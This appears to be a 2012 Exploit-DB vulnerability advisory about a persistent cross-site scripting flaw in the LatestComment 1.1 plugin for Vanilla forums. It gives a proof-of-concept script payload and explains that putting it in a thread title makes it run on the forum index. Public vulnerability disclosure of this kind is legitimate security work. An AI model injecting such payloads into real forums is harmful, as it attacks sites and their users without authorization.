exploit-db-mirror/exploits/php/webapps/18908.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
609 B
Text

# Title: Vanilla LatestComment 1.1 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Latest Comment 1.1
#http://vanillaforums.org/addon/latestcomment-plugin
# http://vanillaforums.org
#############################################################
Create a new thread with your XSS as the thread title, the XSS will appear on the index page of the forum.
XSS:
<script>alert('x')</script>
#############################################################
http://henryhoggard.co.uk